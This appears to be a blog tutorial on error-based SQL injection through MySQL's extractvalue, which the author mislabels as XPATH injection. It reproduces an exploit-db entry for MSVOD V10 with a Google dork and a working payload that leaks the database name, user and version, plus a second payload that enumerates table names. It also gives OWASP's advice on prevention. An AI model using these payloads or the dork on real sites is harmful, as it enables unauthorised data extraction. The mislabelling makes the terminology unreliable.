XPATH SQL Injection Using a Recent Example

Xpath Injection

I’m going to show you a recent example of XPATH injection from exploit-db. This is a common method you’ll have to use when the basic Union Select injection doesn’t work and neither does a string injection. Its a bit more tedious because you’ll have to use limit most of the time.

Fixing Injection

Fixing this kind of injection is relatively simple. According to OWASP:

“Just like SQL injection, in order to protect yourself you must escape single quotes (or double quotes) if your application uses them.”

OWASP logo

Here Is OWASPs’s article on XPATH Injection Vulnerability. I highly advise reading it in order to understand how to prevent this from happening on your own site. If you’re an aspiring penetration tester, this is important to know as well so you can advise your clients.

Example exploit

# Exploit Title: MSVOD V10 ¡V SQL Injection # Google Dork: inurl:"images/lists?cid=13" # Date: 2018/07/17 # Exploit Author: Hzllaga # Vendor Homepage: http://www.msvod.cc/ # Version: MSVOD V10 # CVE : CVE-2018-14418 #Reference : https://www.wtfsec.org/2583/msvod-v10-sql-injection/ Payload: /images/lists?cid=13%20)%20ORDER%20BY%201%20desc,extractvalue(rand(),concat(0x7c,database(),0x7c,user(),0x7c,@@version))%20desc%20--%20
You can tell by looking at the payload that this is an XPATH injection because of the simple fact that it is using “extractvalue”.
Here the cid parameter is vulnerable. But if you were to try union based injection it wouldn’t work. There are a few things to try in this scenario, but one of them is extractvalue.
The actual payload would be
/images/lists?cid=13 ) ORDER BY 1 desc,extractvalue(rand(),concat(0x7c,database(),0x7c,user(),0x7c,@@version)) desc --
Other than the Union Select being missing there is really no difference in the injection.
However, In some cases with XPATH injection you will be stuck going by single lines which can be very time consuming. You will have to use
Limit 0,1, limit 1,1, limit 2,1, etc
One example payload where you’d have to use this method:
?id=1 and extractvalue(rand(),concat(0x3a,(select concat(0x3a,table_name) from information_schema.tables limit 0,1)))--
Here is a link to a useful tutorial on XPATH injections. The english is a little bad, but if you have any questions don’t hesitate to ask them in the comments. This is only to be used for educational or legal purposes. Keep in mind that I take no responsibility for your actions.
The exploit-db and CVE:

Leave a Reply

Your email address will not be published. Required fields are marked *